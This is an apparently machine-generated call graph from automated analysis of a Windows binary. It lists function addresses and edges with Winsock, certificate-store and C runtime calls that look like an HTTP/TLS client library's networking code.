94700 7ff8a9339ee0 94690->94700 94691->94700 94692->94690 94705 7ff8a9337540 18 API calls 94692->94705 94694 7ff8a930cfb0 10 API calls 94694->94700 94696 7ff8a9339840 20 API calls 94696->94700 94697 7ff8a933b0e4 94698 7ff8a933ba90 free free 94698->94700 94699 7ff8a9314a70 14 API calls 94699->94700 94700->94694 94700->94696 94700->94697 94700->94698 94700->94699 94702 7ff8a930a330 298 API calls 94700->94702 94703 7ff8a93398c0 459 API calls 94700->94703 94706 7ff8a933f410 QueryPerformanceCounter GetTickCount 94700->94706 94707 7ff8a9337540 18 API calls 94700->94707 94708 7ff8a933f2d0 17 API calls 94700->94708 94702->94700 94703->94700 94704->94692 94705->94690 94706->94700 94707->94700 94708->94700 94709 7ff8a9306290 send 94710 7ff8a9306366 94709->94710 94711 7ff8a9306314 WSAGetLastError 94709->94711 94715 7ff8a9353b60 2 API calls 94710->94715 94725 7ff8a9306323 94710->94725 94712 7ff8a930632e 94711->94712 94711->94725 94726 7ff8a934ec40 21 API calls 94712->94726 94714 7ff8a9314bb0 14 API calls 94717 7ff8a9306465 94714->94717 94718 7ff8a9306379 94715->94718 94716 7ff8a9306343 94727 7ff8a9314a70 14 API calls 94716->94727 94720 7ff8a9369e10 8 API calls 94717->94720 94722 7ff8a93063b3 WSAIoctl 94718->94722 94718->94725 94721 7ff8a9306488 94720->94721 94723 7ff8a93063f7 94722->94723 94722->94725 94724 7ff8a9306403 setsockopt 94723->94724 94723->94725 94724->94725 94725->94714 94726->94716 94727->94725 94728 7ff8a9308420 94729 7ff8a930842d 94728->94729 94730 7ff8a9308440 94728->94730 94733 7ff8a9363ba0 94729->94733 94734 7ff8a9363bcb 94733->94734 94735 7ff8a9308433 94734->94735 94737 7ff8a9306250 94734->94737 94738 7ff8a9342690 19 API calls 94737->94738 94739 7ff8a9306271 94738->94739 94739->94735 94740 7ff6cabf60dc 94745 7ff6cabf8440 94740->94745 94742 7ff6cabf60e5 94743 7ff6cabf5ff0 _Strcoll 13 API calls 94742->94743 94744 7ff6cabf6102 __vcrt_uninitialize_ptd 94742->94744 94743->94744 94746 7ff6cabf8451 94745->94746 94747 7ff6cabf8455 94745->94747 94746->94742 94747->94746 94748 7ff6cabf7c20 __crtLCMapStringW 70 API calls 94747->94748 94748->94746 94749 7ff8a9318ea0 AcquireSRWLockExclusive 94750 7ff8a9319070 48 API calls 94749->94750 94751 7ff8a9318ebe ReleaseSRWLockExclusive 94750->94751 94752 7ff8a93249e0 94757 7ff8a9324a30 94752->94757 94753 7ff8a9324a87 94801 7ff8a93250c0 94753->94801 94756 7ff8a9324a73 94822 7ff8a9314a70 14 API calls 94756->94822 94757->94753 94757->94756 94759 7ff8a9314b60 18 API calls 94768 7ff8a9324ade 94759->94768 94760 7ff8a9324a82 94762 7ff8a9369e10 8 API calls 94760->94762 94761 7ff8a9324b49 inet_pton 94763 7ff8a9324b61 94761->94763 94764 7ff8a9324b67 inet_pton 94761->94764 94765 7ff8a9324f23 94762->94765 94823 7ff8a93118a0 10 API calls 94763->94823 94764->94763 94766 7ff8a9324c0d 94764->94766 94772 7ff8a9324c2e 94766->94772 94826 7ff8a93243b0 94766->94826 94768->94760 94768->94761 94769 7ff8a9324ba0 94774 7ff8a9324b94 94769->94774 94771 7ff8a9324cfb htons inet_pton 94778 7ff8a9324d4e calloc 94771->94778 94779 7ff8a9324cd6 94771->94779 94772->94760 94772->94771 94777 7ff8a9324ca0 94772->94777 94774->94760 94774->94769 94824 7ff8a9323e50 29 API calls 94774->94824 94776 7ff8a9324bd8 94780 7ff8a9324c00 94776->94780 94781 7ff8a9324ef3 94776->94781 94782 7ff8a9324ccb 94777->94782 94786 7ff8a9324cae 94777->94786 94792 7ff8a9324d73 94778->94792 94799 7ff8a9324cc0 94778->94799 94779->94760 94779->94769 94784 7ff8a9324ea3 94779->94784 94825 7ff8a93116c0 free 94780->94825 94835 7ff8a93252d0 22 API calls SimpleString::operator= 94781->94835 94813 7ff8a9325510 94782->94813 94784->94760 94790 7ff8a9324ebb 94784->94790 94791 7ff8a9324ec2 94784->94791 94831 7ff8a93163d0 486 API calls 94786->94831 94788 7ff8a9324c08 94788->94760 94832 7ff8a93166b0 472 API calls 94790->94832 94833 7ff8a93025a0 47 API calls 94791->94833 94792->94792 94795 7ff8a9324dd9 calloc 94792->94795 94798 7ff8a9324df4 htons inet_pton 94795->94798 94795->94799 94796 7ff8a9324ec0 94797 7ff8a9324ec7 94796->94797 94797->94760 94834 7ff8a93252d0 22 API calls SimpleString::operator= 94797->94834 94798->94799 94799->94779 94799->94799 94802 7ff8a93250f0 94801->94802 94803 7ff8a9334eb0 8 API calls 94802->94803 94808 7ff8a932512e 94803->94808 94804 7ff8a93251bd _time64 94807 7ff8a93251ce 94804->94807 94805 7ff8a9369e10 8 API calls 94806 7ff8a9324ac3 94805->94806 94806->94759 94806->94768 94811 7ff8a9314b60 18 API calls 94807->94811 94812 7ff8a93251ec 94807->94812 94809 7ff8a9334eb0 8 API calls 94808->94809 94810 7ff8a932518d 94808->94810 94808->94812 94809->94810 94810->94804 94810->94807 94810->94812 94811->94812 94812->94805 94814 7ff8a932551d 94813->94814 94815 7ff8a93243b0 94813->94815 94814->94779 94816 7ff8a93243be 94815->94816 94817 7ff8a9324400 socket 94815->94817 94818 7ff8a93243d5 94816->94818 94821 7ff8a93243b0 2 API calls 94816->94821 94819 7ff8a9324419 94817->94819 94820 7ff8a9324426 closesocket 94817->94820 94818->94779 94819->94779 94820->94779 94821->94818 94822->94760 94823->94774 94824->94776 94825->94788 94827 7ff8a9324400 socket 94826->94827 94830 7ff8a93243be 94826->94830 94828 7ff8a9324419 94827->94828 94829 7ff8a9324426 closesocket 94827->94829 94828->94772 94829->94772 94830->94772 94831->94799 94832->94796 94833->94797 94834->94760 94835->94760 94836 7ff8a93189e0 94837 7ff8a93189fb 94836->94837 94838 7ff8a93189ef 94836->94838 94839 7ff8a9318a1b 94837->94839 94840 7ff8a9318a33 94837->94840 94891 7ff8a9314a70 14 API calls 94839->94891 94841 7ff8a9318a72 94840->94841 94842 7ff8a9318a44 94840->94842 94845 7ff8a9318a7b 94841->94845 94860 7ff8a93385f0 94841->94860 94892 7ff8a9337a80 506 API calls 94842->94892 94846 7ff8a9318a27 94847 7ff8a9318a59 94847->94841 94848 7ff8a9318a61 94847->94848 94850 7ff8a9318ab7 94851 7ff8a9318abd 94850->94851 94857 7ff8a9318ae8 94850->94857 94893 7ff8a9338810 459 API calls 94851->94893 94853 7ff8a9318b42 94894 7ff8a9339180 459 API calls 94853->94894 94854 7ff8a9318ac5 94857->94853 94869 7ff8a9339150 94857->94869 94872 7ff8a9338eb0 94857->94872 94858 7ff8a9318b62 94861 7ff8a9338609 94860->94861 94862 7ff8a9338634 94860->94862 94861->94862 94864 7ff8a933869b 94861->94864 94895 7ff8a9338810 459 API calls 94861->94895 94862->94850 94896 7ff8a93374f0 20 API calls 94864->94896 94866 7ff8a93386dc 94897 7ff8a9338370 10 API calls 94866->94897 94868 7ff8a93386e4 94868->94850 94898 7ff8a933b4e0 94869->94898 94873 7ff8a9353b60 2 API calls 94872->94873 94878 7ff8a9338ee7 94873->94878 94874 7ff8a9369e10 8 API calls 94875 7ff8a9339135 94874->94875 94875->94857 94876 7ff8a9338f70 94985 7ff8a930ab50 293 API calls 94876->94985 94878->94876 94884 7ff8a9338f0c 94878->94884 94966 7ff8a9339e10 94878->94966 94881 7ff8a93390f4 94881->94884 94989 7ff8a9338370 10 API calls 94881->94989 94883 7ff8a930cfb0 10 API calls 94888 7ff8a9338f78 94883->94888 94884->94874 94886 7ff8a9314a70 14 API calls 94886->94888 94887 7ff8a9314b60 18 API calls 94887->94888 94888->94881 94888->94883 94888->94886 94888->94887 94889 7ff8a93398c0 459 API calls 94888->94889 94986 7ff8a934dda0 8 API calls 94888->94986 94987 7ff8a9339840 20 API calls 94888->94987 94988 7ff8a9338480 8 API calls 94888->94988 94889->94888 94891->94846 94892->94847 94893->94854 94894->94858 94895->94864 94896->94866 94897->94868 94899 7ff8a933b54d 94898->94899 94902 7ff8a933b538 94898->94902 94900 7ff8a9369e10 8 API calls 94899->94900 94901 7ff8a933916d 94900->94901 94901->94857 94902->94899 94903 7ff8a933b5e2 94902->94903 94906 7ff8a933b5a3 94902->94906 94936 7ff8a9309d10 94903->94936 94905 7ff8a933b5f4 94908 7ff8a933b67d 94905->94908 94916 7ff8a933b617 94905->94916 94922 7ff8a933b751 94905->94922 94906->94903 94906->94922 94948 7ff8a9339ba0 14 API calls 94906->94948 94949 7ff8a93424d0 calloc memmove free 94906->94949 94910 7ff8a933b75c 94908->94910 94914 7ff8a933b6bc getsockopt 94908->94914 94915 7ff8a933b713 WSAEventSelect 94908->94915 94917 7ff8a933b6f9 send 94908->94917 94941 7ff8a933b3c0 94910->94941 94914->94908 94915->94908 94915->94922 94916->94908 94916->94922 94950 7ff8a9342630 calloc memmove free 94916->94950 94917->94908 94918 7ff8a933b76d 94919 7ff8a933b795 94918->94919 94920 7ff8a9342110 17 API calls 94918->94920 94921 7ff8a933b7a0 WSAWaitForMultipleEvents 94919->94921 94919->94922 94926 7ff8a933b7c5 94919->94926 94927 7ff8a933b9e5 94919->94927 94920->94919 94921->94926 94952 7ff8a9342640 free 94922->94952 94923 7ff8a933b9c6 WSAResetEvent 94923->94927 94924 7ff8a933b7f0 WSAEnumNetworkEvents 94925 7ff8a933b8b2 WSAEventSelect 94924->94925 94924->94926 94925->94926 94926->94924 94926->94925 94929 7ff8a933b861 WSAEventSelect 94926->94929 94935 7ff8a933b917 94926->94935 94927->94922 94928 7ff8a933b3c0 10 API calls 94927->94928 94930 7ff8a933ba29 94928->94930 94929->94926 94930->94922 94932 7ff8a933b960 WSAEnumNetworkEvents 94934 7ff8a933b98b WSAEventSelect 94932->94934 94932->94935 94934->94932 94934->94935 94935->94923 94935->94932 94935->94934 94937 7ff8a9309d93 94936->94937 94938 7ff8a9309d25 94936->94938 94953 7ff8a930b250 94938->94953 94940 7ff8a9309d5d 94940->94905 94942 7ff8a933b3fa 94941->94942 94943 7ff8a933b3e1 94941->94943 94944 7ff8a9353b60 2 API calls 94942->94944 94947 7ff8a933b437 94942->94947 94943->94918 94945 7ff8a933b417 94944->94945 94965 7ff8a934dc20 8 API calls 94945->94965 94947->94918 94948->94906 94949->94906 94950->94916 94952->94899 94954 7ff8a930b276 94953->94954 94955 7ff8a930b311 94954->94955 94959 7ff8a930b294 94954->94959 94956 7ff8a9369e10 8 API calls 94955->94956 94957 7ff8a930b31e 94956->94957 94957->94940 94960 7ff8a930b326 94959->94960 94962 7ff8a930b307 94959->94962 94963 7ff8a93424d0 calloc memmove free 94959->94963 94964 7ff8a9342640 free 94960->94964 94962->94955 94963->94959 94964->94962 94965->94947 94967 7ff8a9339e50 94966->94967 94968 7ff8a933b186 94966->94968 94967->94968 94969 7ff8a93398c0 459 API calls 94967->94969 94981 7ff8a9339ed9 94967->94981 94968->94878 94970 7ff8a9339e86 94969->94970 94975 7ff8a9339eaf 94970->94975 94970->94981 94990 7ff8a933ba90 free free 94970->94990 94971 7ff8a930cfb0 10 API calls 94971->94981 94974 7ff8a9339840 20 API calls 94974->94981 94991 7ff8a9337540 18 API calls 94975->94991 94976 7ff8a9314a70 14 API calls 94976->94981 94977 7ff8a93398c0 459 API calls 94977->94981 94979 7ff8a933b0e4 94979->94878 94981->94971 94981->94974 94981->94976 94981->94977 94981->94979 94983 7ff8a930a330 298 API calls 94981->94983 94984 7ff8a933ba90 free free 94981->94984 94992 7ff8a933f410 QueryPerformanceCounter GetTickCount 94981->94992 94993 7ff8a9337540 18 API calls 94981->94993 94994 7ff8a933f2d0 17 API calls 94981->94994 94983->94981 94984->94981 94985->94888 94986->94888 94987->94888 94988->94888 94989->94884 94990->94975 94991->94981 94992->94981 94993->94981 94994->94981 94995 7ff8a9339fa1 95030 7ff8a9354360 94995->95030 94998 7ff8a933ef80 2 API calls 95000 7ff8a9339fd4 94998->95000 94999 7ff8a933a07e 95001 7ff8a930cfb0 10 API calls 94999->95001 95019 7ff8a9339ee0 94999->95019 95002 7ff8a933ef80 2 API calls 95000->95002 95001->95019 95004 7ff8a9339fe7 95002->95004 95005 7ff8a933a01e 95004->95005 95006 7ff8a9353b60 2 API calls 95004->95006 95007 7ff8a933a04f 95005->95007 95010 7ff8a9353b60 2 API calls 95005->95010 95009 7ff8a933a000 95006->95009 95077 7ff8a9355b80 95007->95077 95008 7ff8a930cfb0 10 API calls 95008->95019 95094 7ff8a9337650 18 API calls 95009->95094 95014 7ff8a933a031 95010->95014 95011 7ff8a933b0e4 95095 7ff8a9337650 18 API calls 95014->95095 95016 7ff8a9339840 20 API calls 95016->95019 95018 7ff8a9314a70 14 API calls 95018->95019 95019->95008 95019->95011 95019->95016 95019->95018 95021 7ff8a930a330 298 API calls 95019->95021 95022 7ff8a933ba90 free free 95019->95022 95024 7ff8a93398c0 459 API calls 95019->95024 95098 7ff8a933f410 QueryPerformanceCounter GetTickCount 95019->95098 95099 7ff8a9337540 18 API calls 95019->95099 95100 7ff8a933f2d0 17 API calls 95019->95100 95021->95019 95022->95019 95024->95019 95025 7ff8a933a076 95025->94999 95031 7ff8a9354383 95030->95031 95032 7ff8a93543e7 95031->95032 95033 7ff8a9354397 free 95031->95033 95034 7ff8a93543b0 95031->95034 95102 7ff8a9314a70 14 API calls 95032->95102 95033->95034 95036 7ff8a9354400 95034->95036 95039 7ff8a93543be free 95034->95039 95038 7ff8a935442b 95036->95038 95040 7ff8a9354412 95036->95040 95037 7ff8a9339fa9 95037->94998 95037->94999 95104 7ff8a9365710 calloc 95038->95104 95101 7ff8a9359f80 8 API calls 95039->95101 95103 7ff8a9314a70 14 API calls 95040->95103 95044 7ff8a935446f 95044->95037 95046 7ff8a9354479 free 95044->95046 95045 7ff8a93543e3 95045->95032 95045->95036 95050 7ff8a93544e5 95046->95050 95048 7ff8a9354559 95049 7ff8a935456a 95048->95049 95106 7ff8a9324440 48 API calls 95048->95106 95107 7ff8a93258b0 42 API calls 95049->95107 95050->95050 95105 7ff8a93108d0 91 API calls 95050->95105 95053 7ff8a9354574 95054 7ff8a9354633 95053->95054 95108 7ff8a93226c0 free free free free free 95053->95108 95055 7ff8a935463e free 95054->95055 95056 7ff8a9354665 95054->95056 95111 7ff8a9334d90 95055->95111 95060 7ff8a93546da 95056->95060 95063 7ff8a9354671 95056->95063 95121 7ff8a93446d0 free _strdup 95056->95121 95058 7ff8a935458b 95109 7ff8a933ee70 QueryPerformanceCounter GetTickCount 95058->95109 95125 7ff8a9323340 free 95060->95125 95063->95037 95064 7ff8a935468f 95064->95060 95122 7ff8a93446d0 free _strdup 95064->95122 95066 7ff8a935459b 95068 7ff8a9354620 95066->95068 95070 7ff8a93545ec 95066->95070 95071 7ff8a93545c9 calloc 95066->95071 95068->95063 95110 7ff8a9325770 17 API calls 95068->95110 95069 7ff8a93546a8 95069->95060 95123 7ff8a93446d0 free _strdup 95069->95123 95070->95068 95074 7ff8a93545fe free free 95070->95074 95071->95063 95071->95070 95074->95068 95075 7ff8a93546c1 95075->95060 95124 7ff8a93446d0 free _strdup 95075->95124 95128 7ff8a9340160 free free 95077->95128 95081 7ff8a9355bbe 95082 7ff8a9355c19 95081->95082 95083 7ff8a9355bdf 95081->95083 95084 7ff8a933ef80 2 API calls 95081->95084 95082->95083 95086 7ff8a930a330 298 API calls 95082->95086 95083->95025 95085 7ff8a9355c09 95084->95085 95085->95082 95086->95083 95094->95005 95095->95007 95098->95019 95099->95019 95100->95019 95101->95045 95102->95037 95103->95037 95104->95044 95105->95048 95106->95049 95107->95053 95108->95058 95109->95066 95110->95054 95112 7ff8a9334dc6 95111->95112 95126 7ff8a93350f0 8 API calls 95112->95126 95114 7ff8a9334de2 95115 7ff8a9334dee 95114->95115 95116 7ff8a9334dfc 95114->95116 95127 7ff8a9317c70 free 95115->95127 95119 7ff8a9334e06 95116->95119 95120 7ff8a9334e17 _strdup 95116->95120 95118 7ff8a9334df3 95118->95056 95119->95056 95120->95056 95121->95064 95122->95069 95123->95075 95124->95060 95125->95063 95126->95114 95127->95118 95221 7ff8a9343920 95128->95221 95130 7ff8a93401b0 95231 7ff8a93165c0 95130->95231 95132 7ff8a93401ca 95133 7ff8a9356b50 95132->95133 95134 7ff8a9356b9d 95133->95134 95209 7ff8a9356b93 95133->95209 95249 7ff8a9356910 calloc 95134->95249 95136 7ff8a9356ba2 95136->95209 95257 7ff8a9358670 95136->95257 95137 7ff8a9369e10 8 API calls 95139 7ff8a93574ce 95137->95139 95139->95081 95209->95137 95222 7ff8a9343936 95221->95222 95223 7ff8a9343944 95221->95223 95242 7ff8a9314d90 18 API calls 95222->95242 95243 7ff8a9314d90 18 API calls 95223->95243 95226 7ff8a9343950 95244 7ff8a9344380 free 95226->95244 95228 7ff8a934399c 95228->95130 95229 7ff8a9343942 95229->95228 95230 7ff8a9343987 free 95229->95230 95230->95228 95230->95229 95232 7ff8a9316691 95231->95232 95234 7ff8a93165dd 95231->95234 95232->95132 95233 7ff8a9316630 95233->95232 95247 7ff8a9339180 459 API calls 95233->95247 95234->95232 95234->95233 95245 7ff8a9339180 459 API calls 95234->95245 95236 7ff8a9316626 95246 7ff8a93553c0 459 API calls 95236->95246 95239 7ff8a931667c 95248 7ff8a93553c0 459 API calls 95239->95248 95241 7ff8a9316686 95241->95132 95242->95229 95243->95226 95244->95229 95245->95236 95246->95233 95247->95239 95248->95241 95250 7ff8a9356ab8 95249->95250 95251 7ff8a9356939 95249->95251 95250->95136 95252 7ff8a9353b60 2 API calls 95251->95252 95253 7ff8a9356998 95252->95253 95254 7ff8a9356ae9 95253->95254 95255 7ff8a9356a95 _strdup 95253->95255 95254->95136 95255->95254 95258 7ff8a935868b 95257->95258 95259 7ff8a93586aa 95257->95259 95258->95259 95533 7ff8a93604a6 95534 7ff8a93604ae 95533->95534 95536 7ff8a935c700 21 API calls 95534->95536 95555 7ff8a93604dd 95534->95555 95535 7ff8a9360549 95537 7ff8a93605b2 95535->95537 95538 7ff8a936091b calloc 95535->95538 95547 7ff8a9360591 95535->95547 95536->95555 95667 7ff8a93126d0 MultiByteToWideChar malloc MultiByteToWideChar free 95537->95667 95540 7ff8a936093c 95538->95540 95541 7ff8a9360c22 95538->95541 95672 7ff8a9314a70 14 API calls 95540->95672 95545 7ff8a9361069 95541->95545 95550 7ff8a935c700 21 API calls 95541->95550 95543 7ff8a93607c5 95551 7ff8a9360975 95543->95551 95557 7ff8a93607dc CertOpenStore 95543->95557 95544 7ff8a93605b7 95548 7ff8a93605c3 wcschr 95544->95548 95660 7ff8a936096b 95544->95660 95558 7ff8a93610b0 95545->95558 95559 7ff8a9314b60 18 API calls 95545->95559 95636 7ff8a9360ef7 95545->95636 95546 7ff8a936094b 95552 7ff8a936095b 95546->95552 95553 7ff8a9360955 CertFreeCertificateContext 95546->95553 95547->95543 95562 7ff8a9360796 95547->95562 95554 7ff8a93605dc wcsncmp 95548->95554 95633 7ff8a9360738 95548->95633 95549 7ff8a935c700 21 API calls 95549->95555 95556 7ff8a9360c5b 95550->95556 95564 7ff8a9360998 free 95551->95564 95565 7ff8a93609a3 95551->95565 95561 7ff8a9360960 CertCloseStore 95552->95561 95552->95660 95553->95552 95563 7ff8a9360607 wcsncmp 95554->95563 95630 7ff8a93605fc wcschr 95554->95630 95555->95535 95555->95549 95568 7ff8a93605a6 95555->95568 95556->95545 95603 7ff8a9360c63 95556->95603 95566 7ff8a936086b free CryptStringToBinaryW 95557->95566 95567 7ff8a9360804 95557->95567 95560 7ff8a93610b7 95558->95560 95608 7ff8a93610d0 95558->95608 95559->95558 95679 7ff8a9314a70 14 API calls 95560->95679 95561->95660 95669 7ff8a9314a70 14 API calls 95562->95669 95572 7ff8a9360629 wcsncmp 95563->95572 95563->95630 95564->95565 95573 7ff8a93609ac fseek 95565->95573 95613 7ff8a9360a85 95565->95613 95575 7ff8a93608c8 CertFindCertificateInStore 95566->95575 95576 7ff8a93608b1 95566->95576 95670 7ff8a9312780 WideCharToMultiByte malloc WideCharToMultiByte free 95567->95670 95683 7ff8a9314a70 14 API calls 95568->95683 95569 7ff8a9369e10 8 API calls 95577 7ff8a9361361 95569->95577 95581 7ff8a936064b wcsncmp 95572->95581 95572->95630 95582 7ff8a9360a1d 95573->95582 95583 7ff8a93609cc ftell 95573->95583 95590 7ff8a9360905 95575->95590 95591 7ff8a93608f7 free 95575->95591 95588 7ff8a9360c0d CertCloseStore 95576->95588 95589 7ff8a93608ba free 95576->95589 95578 7ff8a9361300 95682 7ff8a9314a70 14 API calls 95578->95682 95579 7ff8a93610eb strtol 95594 7ff8a9361101 strchr 95579->95594 95579->95608 95596 7ff8a936066a wcsncmp 95581->95596 95581->95630 95597 7ff8a93609db 95582->95597 95599 7ff8a9360a22 fseek 95582->95599 95583->95582 95583->95597 95584 7ff8a9360809 GetLastError 95671 7ff8a9314a70 14 API calls 95584->95671 95587 7ff8a93606fa 95624 7ff8a9360716 _wcsdup 95587->95624 95587->95633 95588->95660 95589->95588 95590->95588 95602 7ff8a936090e 95590->95602 95591->95590 95593 7ff8a9360765 95593->95578 95605 7ff8a9360771 95593->95605 95594->95608 95595 7ff8a93607c0 95623 7ff8a9360858 free 95595->95623 95595->95660 95609 7ff8a9360689 wcsncmp 95596->95609 95596->95630 95619 7ff8a93609ec fread 95597->95619 95620 7ff8a9360a4e fclose 95597->95620 95599->95597 95611 7ff8a9360a3a malloc 95599->95611 95600 7ff8a936131b free 95600->95660 95601 7ff8a9360ab9 malloc 95614 7ff8a9360b69 95601->95614 95615 7ff8a9360ad3 95601->95615 95602->95538 95604 7ff8a9360d42 strchr 95603->95604 95603->95636 95644 7ff8a9360d7a strncmp 95603->95644 95653 7ff8a9360da6 strncmp 95603->95653 95658 7ff8a9360dd7 strncmp 95603->95658 95662 7ff8a9360e0b strncmp 95603->95662 95663 7ff8a9360e8b 95603->95663 95665 7ff8a9360e3f strncmp 95603->95665 95666 7ff8a9360e89 95603->95666 95604->95603 95605->95547 95606 7ff8a936129f 95625 7ff8a934e4c0 17 API calls 95606->95625 95606->95660 95607 7ff8a9361299 CertFreeCertificateContext 95607->95606 95608->95579 95612 7ff8a93611d4 strchr 95608->95612 95626 7ff8a936118c strncmp 95608->95626 95608->95636 95659 7ff8a9361155 strncmp 95608->95659 95621 7ff8a93606a8 wcsncmp 95609->95621 95609->95630 95610 7ff8a9360838 free 95610->95595 95622 7ff8a9360846 free 95610->95622 95611->95597 95612->95608 95612->95636 95613->95601 95613->95613 95617 7ff8a9360b6e free 95614->95617 95618 7ff8a9360b77 95614->95618 95616 7ff8a9360ad8 MultiByteToWideChar 95615->95616 95634 7ff8a9360b0a 95615->95634 95616->95634 95617->95618 95627 7ff8a9360b80 GetLastError 95618->95627 95628 7ff8a9360bc2 CertFindCertificateInStore 95618->95628 95619->95620 95629 7ff8a9360a06 fclose 95619->95629 95632 7ff8a9360a57 95620->95632 95621->95630 95631 7ff8a93606c7 wcsncmp 95621->95631 95622->95595 95623->95660 95624->95557 95624->95633 95635 7ff8a93612b4 95625->95635 95626->95608 95641 7ff8a93611a6 strncmp 95626->95641 95637 7ff8a9360ba9 95627->95637 95638 7ff8a9360b93 95627->95638 95628->95602 95640 7ff8a9360bf0 GetLastError 95628->95640 95629->95632 95639 7ff8a9360a14 95629->95639 95630->95587 95630->95633 95631->95630 95631->95633 95673 7ff8a9314a70 14 API calls 95632->95673 95633->95578 95668 7ff8a9312830 8 API calls 95633->95668 95643 7ff8a935c700 21 API calls 95634->95643 95681 7ff8a9314a70 14 API calls 95635->95681 95636->95606 95636->95607 95675 7ff8a9314a70 14 API calls 95637->95675 95674 7ff8a9314a70 14 API calls 95638->95674 95639->95613 95676 7ff8a9314a70 14 API calls 95640->95676 95641->95608 95649 7ff8a93611fd 95641->95649 95651 7ff8a9360b40 PFXImportCertStore free 95643->95651 95644->95603 95680 7ff8a9314a70 14 API calls 95649->95680 95650 7ff8a9360a72 free 95650->95660 95651->95614 95652 7ff8a9360edc 95678 7ff8a9314a70 14 API calls 95652->95678 95653->95603 95654 7ff8a93612c8 free 95654->95660 95655 7ff8a9360b9f 95655->95660 95658->95603 95659->95608 95660->95569 95662->95603 95677 7ff8a9314a70 14 API calls 95663->95677 95665->95603 95665->95663 95666->95636 95666->95652 95667->95544 95668->95593 95669->95595 95670->95584 95671->95610 95672->95546 95673->95650 95674->95655 95675->95660 95676->95588 95677->95660 95678->95660 95679->95660 95680->95660 95681->95654 95682->95600 95683->95660 95684 7ff8a933a4a4 95685 7ff8a933a4b9 95684->95685 95686 7ff8a933a52e 95685->95686 95687 7ff8a933a503 95685->95687 95689 7ff8a933a583 95686->95689 95704 7ff8a933a299 95686->95704 95730 7ff8a93264f0 95686->95730 95811 7ff8a93264e7 95686->95811 95892 7ff8a93263c0 95686->95892 95979 7ff8a9314a70 14 API calls 95687->95979 95691 7ff8a933a68f 95689->95691 95692 7ff8a933a592 95689->95692 95690 7ff8a933a512 95696 7ff8a93398c0 459 API calls 95690->95696 95693 7ff8a933a741 95691->95693 95697 7ff8a933a6aa 95691->95697 95694 7ff8a933a63b 95692->95694 95695 7ff8a933a59f 95692->95695 95699 7ff8a93398c0 459 API calls 95693->95699 95693->95704 95702 7ff8a933ef80 2 API calls 95694->95702 95694->95704 95701 7ff8a93398c0 459 API calls 95695->95701 95695->95704 95696->95704 95981 7ff8a9354710 19 API calls 95697->95981 95699->95704 95700 7ff8a933a6bc 95703 7ff8a93398c0 459 API calls 95700->95703 95711 7ff8a933a5c8 95701->95711 95702->95704 95706 7ff8a933a6d4 95703->95706 95705 7ff8a930cfb0 10 API calls 95704->95705 95720 7ff8a9339ee0 95704->95720 95705->95720 95708 7ff8a933a6de 95706->95708 95709 7ff8a933a733 free 95706->95709 95710 7ff8a933a6f5 95708->95710 95713 7ff8a933a6e7 free 95708->95713 95709->95704 95982 7ff8a9353d80 45 API calls 95710->95982 95711->95704 95980 7ff8a933ba90 free free 95711->95980 95712 7ff8a933b0e4 95713->95704 95716 7ff8a930cfb0 10 API calls 95716->95720 95717 7ff8a933a706 free 95717->95704 95720->95712 95720->95716 95721 7ff8a9339840 20 API calls 95720->95721 95722 7ff8a933ba90 free free 95720->95722 95723 7ff8a9314a70 14 API calls 95720->95723 95725 7ff8a930a330 298 API calls 95720->95725 95726 7ff8a93398c0 459 API calls 95720->95726 95983 7ff8a933f410 QueryPerformanceCounter GetTickCount 95720->95983 95984 7ff8a9337540 18 API calls 95720->95984 95985 7ff8a933f2d0 17 API calls 95720->95985 95721->95720 95722->95720 95723->95720 95725->95720 95726->95720 95731 7ff8a9326500 95730->95731 95732 7ff8a9334d90 10 API calls 95731->95732 95733 7ff8a932652d 95731->95733 95732->95733 95734 7ff8a9326584 free 95733->95734 95736 7ff8a932659d 95733->95736 95797 7ff8a932673d 95733->95797 95737 7ff8a932668e free 95734->95737 95735 7ff8a9369e10 8 API calls 95738 7ff8a9326cc4 95735->95738 95741 7ff8a9326605 95736->95741 96081 7ff8a932b280 182 API calls _vfwprintf_l 95736->96081 95744 7ff8a93266db 95737->95744 95746 7ff8a93266ae 95737->95746 95738->95689 95740 7ff8a93265f0 95740->95741 95742 7ff8a93265f6 free 95740->95742 95751 7ff8a932661f free 95741->95751 96082 7ff8a932b280 182 API calls _vfwprintf_l 95741->96082 95794 7ff8a9326ca2 95742->95794 95745 7ff8a9326747 free 95744->95745 95748 7ff8a932670a free 95744->95748 95744->95797 95752 7ff8a9326731 95745->95752 95746->95744 95747 7ff8a9334d90 10 API calls 95746->95747 95747->95744 95750 7ff8a9334d90 10 API calls 95748->95750 95750->95752 95751->95737 95751->95794 95753 7ff8a932681f 95752->95753 95756 7ff8a932679b free 95752->95756 95752->95797 95986 7ff8a93297f0 95753->95986 95757 7ff8a93267bf 95756->95757 95758 7ff8a93267b7 95756->95758 95760 7ff8a9334d90 10 API calls 95757->95760 95757->95797 96083 7ff8a93277b0 strchr strchr strchr 95758->96083 95761 7ff8a93267fc free 95760->95761 95761->95753 95761->95797 95762 7ff8a9326835 95763 7ff8a93268be 95762->95763 95764 7ff8a932689e free 95762->95764 95766 7ff8a93268ca 95762->95766 95762->95794 95763->95797 96001 7ff8a9317c20 95763->96001 95765 7ff8a9334d90 10 API calls 95764->95765 95765->95763 95766->95763 95769 7ff8a93268fd free 95766->95769 95771 7ff8a9326924 95769->95771 95772 7ff8a9326917 95769->95772 95770 7ff8a9326c99 96088 7ff8a9317c70 free 95770->96088 95771->95772 95775 7ff8a9326930 95771->95775 95777 7ff8a9334d90 10 API calls 95772->95777 95778 7ff8a9334d90 10 API calls 95775->95778 95776 7ff8a9326a06 95776->95770 95779 7ff8a9334d90 10 API calls 95776->95779 95783 7ff8a9326a68 95776->95783 95777->95763 95778->95763 95780 7ff8a9326a4c 95779->95780 95781 7ff8a9326a55 95780->95781 95780->95783 96084 7ff8a9317c70 free 95781->96084 95784 7ff8a9317c20 9 API calls 95783->95784 95785 7ff8a9326be1 free free free 95784->95785 95785->95770 95786 7ff8a9326c1c 95785->95786 95794->95797 96089 7ff8a9314a70 14 API calls 95794->96089 95797->95735 95812 7ff8a9326500 95811->95812 95813 7ff8a9334d90 10 API calls 95812->95813 95814 7ff8a932652d 95812->95814 95813->95814 95815 7ff8a9326584 free 95814->95815 95817 7ff8a932659d 95814->95817 95878 7ff8a932673d 95814->95878 95818 7ff8a932668e free 95815->95818 95816 7ff8a9369e10 8 API calls 95819 7ff8a9326cc4 95816->95819 95822 7ff8a9326605 95817->95822 96154 7ff8a932b280 182 API calls _vfwprintf_l 95817->96154 95825 7ff8a93266db 95818->95825 95827 7ff8a93266ae 95818->95827 95819->95689 